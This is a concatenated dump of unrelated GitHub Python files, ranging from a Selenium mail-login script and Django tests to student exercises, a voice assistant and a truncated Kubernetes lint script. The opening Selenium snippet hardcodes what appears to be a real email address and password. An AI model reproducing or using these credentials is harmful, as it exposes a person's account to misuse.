login:')\nprint_info()\n\ndriver.find_element_by_xpath(\"//*/input[@id='inputuin']\").send_keys(\"zhongxiao@secway.net.cn\")\ndriver.find_element_by_xpath(\"//*/input[@id='pp']\").send_keys(\"C@1lmexiao\")\ndriver.find_element_by_xpath(\"//*/input[@id='btlogin']\").click()\ntime.sleep(5)\n\nprint('After login:')\nprint_info()\n\ndriver.quit()","repo_name":"dltxiao/seniumvpn","sub_path":"learn/login_exmail.py","file_name":"login_exmail.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19118828366","text":"\"\"\"Test serializers.py file\"\"\"\n\nfrom django.test import TestCase\nfrom rest_framework.serializers import ModelSerializer\n\nfrom console_api.context_sources.models import ContextSources\nfrom console_api.context_sources.serializers import ContextSourcesListSerializer\n\n\nclass ContextSourcesListSerializerTests(TestCase):\n \"\"\"Test ContextSourcesListSerializer serializer\"\"\"\n\n def test_model(self) -> None:\n \"\"\"Test model field of meta\"\"\"\n\n self.assertEqual(\n ContextSourcesListSerializer.Meta.model,\n ContextSources,\n )\n\n def test_fields(self) -> None:\n \"\"\"Test fields field of meta\"\"\"\n\n expected_fields = [\n \"id\",\n \"ioc-type\",\n \"source-url\",\n \"request-method\",\n \"request-headers\",\n \"request-body\",\n \"inbound-removable-prefix\",\n \"outbound-appendable-prefix\",\n \"created-at\",\n \"created-by\",\n ]\n\n self.assertEqual(\n ContextSourcesListSerializer.Meta.fields,\n expected_fields,\n )\n\n def test_extra_kwargs(self) -> None:\n \"\"\"Test extra_kwargs field of meta\"\"\"\n\n expected_extra_kwargs = {\n \"ioc-type\": {\"source\": \"ioc_type\"},\n \"source-url\": {\"source\": \"source_url\"},\n \"request-method\": {\"source\": \"request_method\"},\n \"request-headers\": {\"source\": \"request_headers\"},\n \"request-body\": {\"source\": \"request_body\"},\n \"inbound-removable-prefix\": {\"source\": \"inbound_removable_prefix\"},\n \"outbound-appendable-prefix\": {\n \"source\": \"outbound_appendable_prefix\",\n },\n \"created-at\": {\"source\": \"created_at\"},\n \"created-by\": {\"source\": \"created_by\"},\n }\n\n self.assertEqual(\n ContextSourcesListSerializer.Meta.extra_kwargs,\n expected_extra_kwargs,\n )\n\n def test_mro(self) -> None:\n \"\"\"Test MRO\"\"\"\n\n self.assertIn(ModelSerializer, ContextSourcesListSerializer.mro())\n","repo_name":"hulahoo/console-check-sonar","sub_path":"src/console_api/context_sources/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73860071086","text":"photo_tags = {}\nphoto_scores = {}\n\n\ndef open_file(infile):\n fin = open(infile, 'r')\n photo_sec = fin.readlines()[1:]\n fin.close()\n return photo_sec\n\n\ndef file_operation(sec):\n i = 0\n for x in sec:\n if x[4] != \" \":\n photo_tags[i] = set(x[4:].rstrip().split(\" \"))\n else:\n photo_tags[i] = set(x[5:].rstrip().split(\" \"))\n\n i += 1\n return\n\n\ndef score(outfile):\n # for x, y in dic.items():\n # for i, j in dic.items():\n # if i in photo_scores\n # photo_scores[x] = {i: [len(y.difference(j)), len(y.intersection(j)), len(j.difference(i))]}\n fout = open(outfile, 'r')\n out_list = fout.readlines()[1:]\n result = 0\n\n for x in range(len(out_list)):\n out_list[x] = out_list[x].rstrip()\n # print(out_list)\n for x in range(len(out_list) - 1):\n left, right = photo_tags[int(out_list[x])], photo_tags[int(out_list[x + 1])]\n intersection = len(photo_tags[int(out_list[x])].intersection(photo_tags[int(out_list[x + 1])]))\n minimum = min(abs(len(left) - intersection), intersection, abs(len(right) - intersection))\n result += minimum\n # print(result)\n\n return result\n\n\nif __name__ == '__main__':\n # original = \"a_example.txt\"\n # original = \"b_lovely_landscapes.txt\"\n original = \"c_memorable_moments.txt\"\n # original = \"d_pet_pictures.txt\"\n # original = \"e_shiny_selfies.txt\"\n\n photo_sec = open_file(original)\n file_operation(photo_sec)\n print(len(photo_sec))\n # print(len(photo_tags))\n print(\"Your Score is \" + str(score(\"Final_output.txt\")))\n","repo_name":"Cooiut/Photo-slideshow","sub_path":"Test/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40508570411","text":"import random\n\ntopOfRange = input('enter a number: ')\n\n\nif topOfRange.isdigit():\n topOfRange = int(topOfRange)\n if topOfRange <= 0 :\n print('please enter a number larger than 0 next time')\n quit()\nelse: \n print('please enter a number next time')\n\n \nnum = random.randint(-1,topOfRange)\nprint(num)\nguesses = 0\nwhile True:\n userGuess = input('make a guess: ')\n if userGuess.isdigit():\n userGuess = int(userGuess)\n else: \n print('please enter a number next time')\n continue\n\n if userGuess == num:\n print('you got it!','after', guesses, 'guesses')\n break\n else: \n guesses += 1\n if userGuess > num:\n print('guess smaller number')\n else:\n print('guess larger number')\n\n\n\n ","repo_name":"emranaloul/grid","sub_path":"number_guesser.py","file_name":"number_guesser.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19256811916","text":"import sys\nimport mysql.connector\nclass Nota():\n def __init__(self,titulo,nota):\n self.__titulo=titulo\n self.__nota=nota\n\n def get_titulo(self):\n return self.__titulo\n\n def get_nota(self):\n return self.__nota\n\ndef ingresar_nota():\n print(\"ingrese su nota en el nombre de las persona ingrese 'destinatario' y 'remitente'\\\n para salir escriba termine solo\")\n \"\"\"Recibe la nota en oraciones\"\"\"\n lista_renglones=[]\n titulo=input(\"ingrese Titulo: \")\n while True:\n print(\"Linea:\",end=\" \")\n renglon=input(\"\")\n if renglon.lower()==\"termine\":\n break\n while len(renglon)>399:\n if len(renglon[0:renglon.find(\".\")+1]) < 399:\n lista_renglones.append(renglon[0:renglon.find(\".\")+1])\n renglon=renglon[renglon.find(\".\")+1:len(renglon)-1]\n elif len(renglon[0:renglon.find(\",\")+1]) < 399:\n lista_renglones.append(renglon[0:renglon.find(\",\")+1])\n renglon=renglon[renglon.find(\",\")+1:len(renglon)-1] \n else:\n lista_renglones.append(renglon[0:399])\n renglon=renglon[399:len(renglon)-1]\n lista_renglones.append(renglon)\n nota=Nota(titulo, lista_renglones) \n return nota\n \n \n\ndef ingresar_personas():\n \"\"\"recibe los destinatarios\"\"\"\n lista=[]\n while True:\n destinatario=input(\"Ingrese la persona destinatario, ingrese un numero \\\npara salir: \")\n print(\"\")\n if destinatario.isnumeric():\n break\n lista.append(destinatario)\n \"\"\"recibe el remitente\"\"\" \n remitente=input(\"Ingrese la persona remitente: \") \n return lista,remitente\n\ndef cambiar_mensaje(nota_entrante,destinatario,remitente):\n \"\"\"cambiar destinatario y remitente\"\"\"\n nota_recibida=nota_entrante.copy()\n for y,x in enumerate(nota_recibida):\n nota_recibida[y]=x.replace(\"destinatario\",destinatario).replace(\"remitente\",remitente) \n return nota_recibida\n\ndef cargar_nota():\n \"\"\"cargar archivo nota\"\"\"\n notas=[]\n conexion1=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"nota\"\n )\n cursor=conexion1.cursor()\n \"\"\"cursor de titulo\"\"\"\n query=\"SELECT titulo,id_nota FROM titulo\"\n cursor.execute(query)\n identificador=cursor.fetchall()\n \"\"\"cursor de renglón\"\"\"\n query=\"SELECT id_nota,renglones FROM renglones\"\n cursor.execute(query)\n archi=cursor.fetchall()\n \"\"\"devuelve una lista de dato clase nota\"\"\"\n for titulo,id_nota in identificador:\n renglones=[]\n for x in archi:\n if x[0]==id_nota:\n renglones.append(x[1])\n notas.append(Nota(titulo,renglones))\n return notas\n\ndef buscar_por_nombre(nota):\n \"\"\"busca\"\"\"\n notas=cargar_nota()\n for note in notas:\n if note.get_titulo()==nota.get_titulo():\n return note\n\ndef guardar_nota(nota):\n \"\"\"conecta con mysql\"\"\"\n conexion1=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"nota\"\n )\n cursor=conexion1.cursor()\n \n \"\"\"crea el titulo si no existe\"\"\"\n query=\"INSERT INTO titulo(titulo) SELECT(%s) FROM dual WHERE \\\nNOT EXISTS(SELECT titulo FROM titulo WHERE titulo=%s)LIMIT 1\"\n dato=(nota.get_titulo(),nota.get_titulo())\n cursor.execute(query,dato)\n conexion1.commit()\n \n \"\"\"trae el identificador del titulo\"\"\"\n query=\"SELECT id_nota FROM titulo where titulo=%s\"\n dato=(nota.get_titulo(),)\n cursor.execute(query,dato)\n id_nota_titulo=cursor.fetchall()\n \n \"\"\"busca el identidicador dentro de los renglones\"\"\"\n query=\"SELECT id_nota FROM renglones where id_nota=%s\"\n dato=id_nota_titulo[0]\n cursor.execute(query,dato)\n id_nota_renglones=cursor.fetchall()\n \n \"\"\"si no existe nota con ese identificador la crea\"\"\"\n if id_nota_renglones == []:\n query=\"INSERT INTO renglones(id_nota,renglones) values (%s,%s)\"\n nota_texto=nota.get_nota()\n for renglon in nota_texto:\n datos=(id_nota_titulo[0][0],renglon)\n cursor.execute(query,datos)\n conexion1.commit()\n return True\n else:\n print(\"nota con ese nombre existe\") \n return False\n\ndef elegir_predefinido():\n try:\n lista_nota=cargar_nota()\n except Exception as ex:\n print(\"hola\")\n print(ex)\n \n print(\"\")\n for lis in lista_nota:\n mostrar_nota(lis)\n print(\"\")\n\n titulo=input(\"titulo elegido: \").lower()\n for nota in lista_nota:\n if nota.get_titulo()==titulo:\n nota_elegida=nota\n break\n return nota_elegida\n\ndef mostrar_nota(tipo_nota):\n titulo=tipo_nota.get_titulo()\n lista=tipo_nota.get_nota()\n print(\"\")\n print(\"----\")\n print(\"\\t\",titulo.upper())\n print(\"\")\n for x,linea in enumerate(lista):\n if x==0:\n print(\" \",linea)\n elif x==len(lista)-1:\n print(\" \",linea)\n else:\n print(\" \",linea) \n\n\ndef main():\n print(\"1- Mensaje predefinido\")\n print(\"2- Mensaje propio\")\n print(\"sali con cualquier otra opción\")\n opcion=int(input(\"Ingrese Opción:\"))\n if opcion == 1:\n print(\"Modelos de nota\")\n nota=elegir_predefinido() \n elif opcion == 2:\n print(\"Manda tu mensaje\") \n print(\"\")\n nota=ingresar_nota()\n \"\"\"si la nota existe entrega la copia existente\"\"\"\n if not guardar_nota(nota):\n nota=buscar_por_nombre(nota)\n else:\n sys.exit(0)\n\n destinatarios,remitente=ingresar_personas()\n for destinatario in destinatarios:\n mostrar_nota(Nota(nota.get_titulo(),cambiar_mensaje(nota.get_nota(),destinatario,remitente)))\n\nmain()","repo_name":"informatorio2020com07/actividades","sub_path":"CarlosComba/actividad_004/actividad_4.py","file_name":"actividad_4.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30259726989","text":"import pytest\n\nfrom tests.integration.helper import NetpalmTestHelper\n\nhelper = NetpalmTestHelper()\n\n\n@pytest.mark.test_worker_route\ndef test_worker():\n res = helper.get(\"workers/\")\n assert len(res) > 0\n\n\n@pytest.mark.test_kill_worker\ndef test_kill_worker():\n resz = helper.get(\"workers/\")\n rt = \"workers/kill/\" + resz[0][\"name\"]\n rest = helper.post(rt, data={})\n assert rest is None\n\n\n@pytest.mark.test_pinned_container\ndef test_worker_pinned_container():\n res = helper.get(\"containers/pinned/\")\n assert len(res) > 0\n","repo_name":"tbotnz/netpalm","sub_path":"tests/integration/test_worker.py","file_name":"test_worker.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":423,"dataset":"github-code","pt":"2"} +{"seq_id":"74755122606","text":"import speech_recognition as sr\r\nimport pyttsx3\r\nimport pywhatkit\r\nimport datetime\r\nimport wikipedia\r\nimport pyowm\r\nfrom pyowm import OWM\r\n\r\nlistener = sr.Recognizer()\r\n\r\nmachine = pyttsx3.init()\r\n\r\n\r\ndef talk(text):\r\n machine.say(text) # Give O/p of Text\r\n machine.runAndWait()\r\n\r\n\r\nprint(\"How may I help You!!\")\r\ntalk(\"How may I help You!!\")\r\n\r\n\r\n# Function to take instruction and s=show it on screen\r\ndef input_instruction():\r\n # Listening Part Of Assistant\r\n # Try Block is used to check there is any kind of error in microphone\r\n global instruction\r\n try:\r\n\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n\r\n speech = listener.listen(source, timeout=20)\r\n instruction = listener.recognize_google(speech) # Google API\r\n instruction = instruction.lower()\r\n if \"Hey Assistant\" in instruction: # Assistant listening the Command\r\n instruction = instruction.replace('Hey Assistant', \" \")\r\n print(instruction)\r\n\r\n return instruction\r\n\r\n\r\n except sr.WaitTimeoutError:\r\n print(\"Listening timed out.\")\r\n\r\n except sr.RequestError:\r\n print(\"Could not request results; check your network connection.\")\r\n\r\n except sr.UnknownValueError:\r\n print(\"Sorry, I didn't catch that.\")\r\n\r\n\r\n# Weather Function to check specific city weather\r\n\r\ndef get_weather(city):\r\n # install & import pyown library\r\n # for api key read the documentation of pyowm library on google\r\n api_key = 'Your_api_key'\r\n owm = OWM(api_key)\r\n mgr = owm.weather_manager()\r\n try:\r\n observation = mgr.weather_at_place(city + ',IN')\r\n w = observation.weather\r\n weather_info = w.detailed_status\r\n temperature = w.temperature('celsius')['temp']\r\n print(f\"The weather in {city} is {weather_info}. The temperature is {temperature} degrees Celsius.\")\r\n talk(f\"The weather in {city} is {weather_info}. The temperature is {temperature} degrees Celsius.\")\r\n except pyowm.exceptions.api_response_error.NotFoundError:\r\n talk(f\"Sorry, I couldn't find weather information for {city}.\")\r\n\r\n\r\ndef play_assistant():\r\n instruction = input_instruction()\r\n print(instruction)\r\n if instruction is None:\r\n talk(\"No commands to execute,Okay Thnx\")\r\n # 1. Command to Play Youtube_Video. Say - Hey Assistant Play \"Video_name\"\r\n elif \"play\" in instruction:\r\n song = instruction.replace('play', \"\") # instaead of play the Assistant say the name of video\r\n talk(\"playing\" + song)\r\n pywhatkit.playonyt(song)\r\n\r\n\r\n # 2. Command to ask current time. Say - Hey Assistant any sentence where time word is mentioned\r\n elif 'time' in instruction:\r\n time = datetime.datetime.now().strftime('%I:%M%p')\r\n talk('Current time is ' + time)\r\n\r\n # 3. Command to ask Today's date. Say - Hey Assistant any sentence where 'today's date' word is mentioned\r\n elif 'date' in instruction:\r\n date = datetime.datetime.now().strftime('%d /%m / %y')\r\n talk(\"Today's'is \" + date)\r\n\r\n elif 'How are you' in instruction:\r\n talk(\"I'm Fine , how about you\")\r\n\r\n # 5. Command to ask about a particular person. Say - Hey Assistant who is 'person name'\r\n elif 'who is' in instruction:\r\n human = instruction.replace('who is', \" \")\r\n info = wikipedia.summary(human, 1)\r\n print(info)\r\n talk(info)\r\n\r\n # 6. Command to ask about any thing. Say - Hey Assistant any sentence what is 'thing name'\r\n elif 'what is' in instruction:\r\n query = instruction.replace('what is', \" \")\r\n info = wikipedia.summary(query, 1)\r\n print(info)\r\n talk(info)\r\n\r\n # 7. Command to add 2 digits.Say - Hey Assistant add two number and provide it number one by one\r\n elif \"add\" in instruction:\r\n talk(\"Ok! Please tell first digit\")\r\n spokent_text1 = input_instruction()\r\n talk(\"First Digit is: \" + spokent_text1)\r\n talk(\"Ok! Please tell second digit\")\r\n spokent_text2 = input_instruction()\r\n talk(\"Second Digit is: \" + spokent_text2)\r\n sum = int(spokent_text1) + int(spokent_text2)\r\n talk(\"Sum of this 2 digit is: \" + str(sum))\r\n\r\n # 8. Command to ask weather of any city. Say - weather of 'city name'\r\n # Tell only city name once again when Assistant asks\r\n elif 'weather' in instruction:\r\n talk(\"Okay can you please say city name again?\")\r\n cityname = input_instruction()\r\n get_weather(cityname)\r\n\r\n # else condition\r\n else:\r\n talk(\"Please Repeat!!\")\r\n\r\n\r\nplay_assistant() # play_Assistant funtion called\r\n","repo_name":"Vinay1311/Virtual_Assistant","sub_path":"Assistant.py","file_name":"Assistant.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33323620940","text":"#094 Display an array of five numbers. Ask the user to select one of the numbers. \n#Once they have selected a number, display the position of that item in the array. If they enter something that is not in the array,\n#ask them to try again until they select a relevant item\nfrom array import*\n\ndef numbers():\n \n numbers = array('i',[1,5,3,4,9])\n print(numbers)\n choice = int(input('Select a number from array: '))\n \n while choice not in numbers:\n choice = int(input('Try again enter a number: '))\n print(numbers.index(choice))\n \n\nnumbers()\n\n\n\n","repo_name":"JonathanVillordo/PythonByExample","sub_path":"Challenge_094.py","file_name":"Challenge_094.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"34135688716","text":"import random\nrock=''' \n _\n | |\n _ __ ___ ___| | __\n| '__/ _ \\ / __| |/ /\n| | | (_) | (__| <\n|_| \\___/ \\___|_|\\_\\ \n'''\n\npaper=''' \n_ __ __ _ _ __ ___ _ __ \n| '_ \\ / _` | '_ \\ / _ \\ '__|\n| |_) | (_| | |_) | __/ | \n| .__/ \\__,_| .__/ \\___|_| \n| | | | \n|_| |_| \n'''\n\nscissor=''' \n _ ,/'\n (_). ,/'\n __ ::\n (__)' `\\.\n `\\.\n\n \n '''\ngame_images=[rock,paper,scissor] #list of images\n\nyour_choice=int(input(\"what do you choose? Type 0 for rock, 1 for paper or 2 for scissors. \\n\")) #users input\nprint(game_images[your_choice])\ncomputer_choice=random.randint(0,2) #computers input\nprint(\"Computer chose: \")\nprint(game_images[computer_choice])\nif your_choice==computer_choice:\n print(\"Its a draw\")\nelif your_choice==0: #o is rock\n if computer_choice==1: #1 is paper ( paper covers rock hence you win)\n print(\"Computer wins , paper covers rock\")\n else:\n print(\"You Win, rock crushes scissor\")\nelif your_choice==1: #1 is paper\n if computer_choice==0: #1 is rock ( paper covers rock hence Computer wins)\n print(\"You win, paper covers rock\")\n else:\n print(\"Computer wins , scissor cuts paper\")\nelif your_choice==2: #2 is scissor\n if computer_choice==0: #0 is rock ( rock crushes scissor hence You win)\n print(\"Computer wins , rock crushes scissor\")\n else: #1 is paper ( scissor cuts paper)\n print(\"You win , scissor cuts paper\")\nelse:\n print(f\"You chose {your_choice} & Computer chose {computer_choice}, You lose\")\n\n\n\n","repo_name":"KanmaniThiagarajan/100DaysOfPython","sub_path":"d04/rockpaperscissor.py","file_name":"rockpaperscissor.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"628266021","text":"n = int(input())\nstack = []\n\nfor i in range(n):\n queries = input()\n\n if queries[0] == '1':\n queries = queries.split()\n number = int(queries[1])\n stack.append(number)\n else:\n if len(stack) > 0:\n if queries == '2':\n stack.pop()\n elif queries == '3':\n print(max(stack))\n else:\n print(min(stack))\n\nstack = stack[::-1]\nprint(', '.join(str(i) for i in stack))","repo_name":"PavelElenov/Python_Advanced","sub_path":"Lists as Stacks and Queues - Exercise/stacked_queries.py","file_name":"stacked_queries.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25886970505","text":"from turtle import Turtle, Screen\nimport random\n\ncorrida = True\nscreen = Screen()\nscreen.setup(width=500, height=400)\nescolha = screen.textinput(title=\"Faça a sua aposta\", prompt=\"Qual tartaruga irá ganhar a corrida?\\nRED, ORANGE, YELLOW, GREEN, BLUE, PURPLE\\nInsira uma cor: \")\ncores = [\"RED\", \"ORANGE\", \"YELLOW\", \"GREEN\", \"BLUE\", \"PURPLE\"]\ny_tartaruga = [-70, -40, -10, 20, 50, 80]\ntodas_tartarugas = []\n\nfor turtle_index in range(0, 6):\n nova_tartaruga = Turtle(shape=\"turtle\")\n nova_tartaruga.color(cores[turtle_index])\n nova_tartaruga.penup()\n nova_tartaruga.goto(x=-230, y=y_tartaruga[turtle_index])\n todas_tartarugas.append(nova_tartaruga)\n\nif escolha:\n corrida = True\n\nwhile corrida:\n for turtle in todas_tartarugas:\n if turtle.xcor() > 230:\n corrida = False\n vencedora = turtle.pencolor()\n if vencedora == escolha:\n print(f\"Você ganhou! A tartaruga vencedora foi a {vencedora}\")\n else:\n print(f\"Você perdeu! A tartaruga vencedora foi a {vencedora}\")\n\n distancia = random.randint(0, 10)\n turtle.forward(distancia)\n\nscreen.exitonclick()","repo_name":"brunomdrrosa/100DaysOfPython","sub_path":"Day19/corridaDeTartaruga.py","file_name":"corridaDeTartaruga.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"36008028426","text":"from bokeh.plotting import figure, show, from_networkx\nfrom bokeh.models import Range1d, Plot, HoverTool\nfrom bokeh.palettes import Category20_20\n\nimport networkx as nx\n\n# NetworkX\nG = nx.desargues_graph()\n\n# Plot figure \np = Plot(x_range=Range1d(-2, 2), y_range=Range1d(-2, 2))\n\n# Creating a bokeh graph\ng = from_networkx(G, nx.spring_layout, scale = 1.8, center=(0,0))\np.renderers.append(g)\n\n# Add Data\ng.node_renderer.data_source.data['person'] = list(range(len(G)))\ng.node_renderer.data_source.data[\"colors\"] = Category20_20\n\n# Setup default node as circle\ng.node_renderer.glyph.update(size=15, fill_color=\"colors\")\n\n# Set edges (connections)\ng.edge_renderer.glyph.line_dash = [2,2]\n\np.add_tools(HoverTool(tooltips=\"Person ID: @person\"))\n\nshow(p)\n\n\n","repo_name":"markumreed/data_science_for_everyone","sub_path":"bokeh_project/bokeh_graph_network_plots.py","file_name":"bokeh_graph_network_plots.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"2"} +{"seq_id":"22102320906","text":"from models.genes8bitarray import *\nfrom models.genes32bitarray import *\nfrom models.config import Config\nimport random\n\n\n\ndef check_set_and_get_code(genes):\n # Given a set of genes with random values\n values = []\n for code in genes.codeIndexRange():\n values.append(random.randint(0, 1))\n genes.buildEmpty()\n for code in genes.codeIndexRange():\n genes.setCode(code, values[code])\n\n # When the values in the genes are tested, they match the original values\n for code in genes.codeIndexRange():\n assert values[code] == genes.getCode(code)\n\ndef test_set_and_get_code():\n config = Config()\n check_set_and_get_code(GenesAs8BitArray(config))\n check_set_and_get_code(GenesAs32BitArray(config))\n\ndef check_genes_are_empty(genes):\n # Given a set of genes with zero values\n genes.buildEmpty()\n\n # When they are tested, they are all zero\n assert True == genes.areEmpty()\n\ndef test_new_genes_are_empty():\n config = Config()\n check_genes_are_empty(GenesAs8BitArray(config))\n check_genes_are_empty(GenesAs32BitArray(config))\n\ndef check_mutated_genes_are_not_all_zero(genes, config):\n # Given a set of genes with zero values that will likely mutate\n genes.buildEmpty()\n config.mutation_probability = config.mutation_probability * 10\n\n # When they are mutated\n genes.mutate()\n\n # Then the number mutated falls inside the range of mutation probability\n mutated_count = 0\n for code in genes.codeIndexRange():\n if (genes.getCode(code) == 1):\n mutated_count += 1\n assert mutated_count > 0\n assert mutated_count <= 2.0 * genes.number_of_codes * config.mutation_probability\n\ndef test_mutated_genes_are_not_all_zero():\n config = Config()\n check_mutated_genes_are_not_all_zero(GenesAs8BitArray(config), config)\n check_mutated_genes_are_not_all_zero(GenesAs32BitArray(config), config)\n\ndef check_mutation_can_be_disabled(genes, config):\n # Given a set of genes with zero values that will not mutate\n genes.buildEmpty()\n config.mutation_probability = 0\n\n # When they are mutated\n genes.mutate()\n\n # Then none have changed\n mutated_count = 0\n for code in genes.codeIndexRange():\n if (genes.getCode(code) == 1):\n mutated_count += 1\n assert mutated_count == 0\n\ndef test_mutation_can_be_disabled():\n config = Config()\n check_mutation_can_be_disabled(GenesAs8BitArray(config), config)\n check_mutation_can_be_disabled(GenesAs32BitArray(config), config)\n\ndef then_they_fall_into_the_float_range(config, genes):\n genes.buildFromRandom()\n\n fitness = genes.fitness(1)\n\n assert 0.0 <= fitness\n assert 1.0 >= fitness\n\ndef test_genes_as_float_using_default_range():\n # Given a set of genes with non zero values\n config = Config()\n\n then_they_fall_into_the_float_range(config, GenesAs8BitArray(config))\n then_they_fall_into_the_float_range(config, GenesAs32BitArray(config))\n\ndef test_genes__with_large_bit_coding_as_float():\n # Given a set of genes with non zero values\n config = Config()\n config.number_of_genes = 111\n config.size_of_each_gene = 111\n\n then_they_fall_into_the_float_range(config, GenesAs8BitArray(config))\n then_they_fall_into_the_float_range(config, GenesAs32BitArray(config))\n\ndef test_configurable_float_range():\n # Given a set of genes with non zero values and a different float range\n config = Config()\n config.float_lower = 1.5\n config.float_upper = 4.5\n\n then_they_fall_into_the_float_range(config, GenesAs8BitArray(config))\n then_they_fall_into_the_float_range(config, GenesAs32BitArray(config))\n\ndef are_genes_the_same(individual1, individual2):\n for code in individual1.codeIndexRange():\n if (individual1.getCode(code) != individual2.getCode(code)):\n return False\n return True\n\ndef create_father_different_to_mother(config, mother, genesBuilder):\n father = genesBuilder(config)\n father.buildFromRandom()\n while(are_genes_the_same(father, mother)):\n father.mutate()\n return father\n\ndef check_baby_is_not_identical_to_mother_or_father(genesBuilder):\n # Given a mother with some mutated genes, a father with some mutated genes and a baby\n config = Config()\n config.mutation_probability = config.mutation_probability * 10\n mother = genesBuilder(config)\n mother.buildFromRandom()\n father = create_father_different_to_mother(config, mother, genesBuilder)\n baby = genesBuilder(config)\n different_to_mother = False\n different_to_father = False\n\n # When the baby inherits from the mother and father\n baby.inheritFrom(mother, father)\n\n # Then the baby's genes are different to both\n for code in baby.codeIndexRange():\n if (baby.getCode(code) != father.getCode(code)):\n different_to_father = True\n if (baby.getCode(code) != mother.getCode(code)):\n different_to_mother = True\n assert different_to_father == True\n assert different_to_mother == True\n\ndef test_baby_is_not_identical_to_mother_or_father():\n check_baby_is_not_identical_to_mother_or_father(GenesAs8BitArray)\n check_baby_is_not_identical_to_mother_or_father(GenesAs32BitArray)\n\ndef check_baby_is_not_zero(genesBuilder):\n # Given a mother, a father and a baby\n # Given a mother with some mutated genes, a father with some mutated genes and a baby\n config = Config()\n config.mutation_probability = config.mutation_probability * 10\n mother = genesBuilder(config)\n mother.buildFromRandom()\n father = create_father_different_to_mother(config, mother, genesBuilder)\n baby = genesBuilder(config)\n non_zero = False\n\n # When the baby inherits from the mother and father\n baby.inheritFrom(mother, father)\n\n # Then the baby's genes are non zero\n for code in baby.codeIndexRange():\n if (baby.getCode(code) != 0):\n non_zero = True\n assert non_zero == True\n\ndef test_baby_is_not_zero():\n check_baby_is_not_zero(GenesAs8BitArray)\n check_baby_is_not_zero(GenesAs32BitArray)\n\ndef check_baby_is_similar_to_mother_and_father(genesBuilder):\n # Given a mother with some mutated genes, a father with some mutated genes and a baby\n config = Config()\n config.mutation_probability = config.mutation_probability * 10\n genesBuilder = genesBuilder\n mother = genesBuilder(config)\n mother.buildFromRandom()\n father = create_father_different_to_mother(config, mother, genesBuilder)\n baby = genesBuilder(config)\n similar_to_mother = False\n similar_to_father = False\n\n # When the baby inherits from the mother and father\n baby.inheritFrom(mother, father)\n\n # Then the baby's genes has some similarity to both\n for code in baby.codeIndexRange():\n if (baby.getCode(code) == father.getCode(code)):\n similar_to_father = True\n if (baby.getCode(code) == mother.getCode(code)):\n similar_to_mother = True\n assert similar_to_mother == True\n assert similar_to_father == True\n\ndef test_baby_is_similar_to_mother_and_father():\n check_baby_is_similar_to_mother_and_father(GenesAs8BitArray)\n check_baby_is_similar_to_mother_and_father(GenesAs32BitArray)\n","repo_name":"petecallaghan/PopulationFitness","sub_path":"Python/test/test_genes.py","file_name":"test_genes.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35852804486","text":"import argparse\nimport os\nimport re\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"filenames\", help=\"list of files to check, all files if unspecified\", nargs='*')\nargs = parser.parse_args()\n\n# Cargo culted from http://stackoverflow.com/questions/898669/how-can-i-detect-if-a-file-is-binary-non-text-in-python\ndef is_binary(pathname):\n \"\"\"Return true if the given filename is binary.\n @raise EnvironmentError: if the file does not exist or cannot be accessed.\n @attention: found @ http://bytes.com/topic/python/answers/21222-determine-file-type-binary-text on 6/08/2010\n @author: Trent Mick \n @author: Jorge Orpinel \"\"\"\n try:\n with open(pathname, 'r') as f:\n CHUNKSIZE = 1024\n while True:\n chunk = f.read(CHUNKSIZE)\n if '\\0' in chunk: # found null byte\n return True\n if len(chunk) < CHUNKSIZE:\n break # done\n except:\n return True\n\n return False\n\ndef get_all_files(rootdir):\n all_files = []\n for root, dirs, files in os.walk(rootdir):\n # don't visit certain dirs\n if 'vendor' in dirs:\n dirs.remove('vendor')\n if 'staging' in dirs:\n dirs.remove('staging')\n if '_output' in dirs:\n dirs.remove('_output')\n if '_gopath' in dirs:\n dirs.remove('_gopath')\n if 'third_party' in dirs:\n dirs.remove('third_party')\n if '.git' in dirs:\n dirs.remove('.git')\n\n for name in files:\n pathname = os.path.join(root, name)\n if not is_binary(pathname):\n all_files.append(pathname)\n return all_files\n\n# Collects all the flags used in golang files and verifies the flags do\n# not contain underscore. If any flag needs to be excluded from this check,\n# need to add that flag in hack/verify-flags/excluded-flags.txt.\ndef check_underscore_in_flags(rootdir, files):\n # preload the 'known' flags which don't follow the - standard\n pathname = os.path.join(rootdir, \"hack/verify-flags/excluded-flags.txt\")\n f = open(pathname, 'r')\n excluded_flags = set(f.read().splitlines())\n f.close()\n\n regexs = [ re.compile('Var[P]?\\([^,]*, \"([^\"]*)\"'),\n 